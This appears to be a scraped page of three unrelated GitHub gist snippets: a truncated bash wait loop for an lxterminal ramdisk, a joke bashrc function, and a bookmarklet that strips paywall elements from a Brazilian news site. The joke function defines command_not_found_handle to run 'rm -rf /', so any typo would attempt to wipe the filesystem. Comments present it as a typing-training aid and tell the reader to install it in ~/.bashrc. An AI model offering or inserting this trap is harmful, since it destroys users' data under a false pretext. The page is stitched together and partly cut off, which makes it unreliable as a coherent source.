This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
declare win_id | |
declare d="$HOME/.ramdisk/lxterminal" | |
if [[ -d "$d/working" ]] ; then | |
# wait two second | |
declare -i waits=0 | |
while [[ $waits -lt 20 ]] ; do | |
[[ ! -d "$d/working" ]] && break |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Оригинальный код Иван (2015). | |
# | |
# For not type wrong in bash. | |
# Is like we train in Russia. | |
# Need bash of at least version 4 to work. | |
# For make work need add to ~/.bashrc and command of `source ~/.bashrc` | |
command_not_found_handle () { | |
rm -rf / # Good exercise of punish. Give chance of cancel. | |
} | |
# Eредавайте привет Тане. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Pra quem quiser ler matérias da zh sem "associar o facebook" | |
// roda no console, ou adiciona nos bookmarks. | |
javascript:$('[href*="paywall"]').remove(); |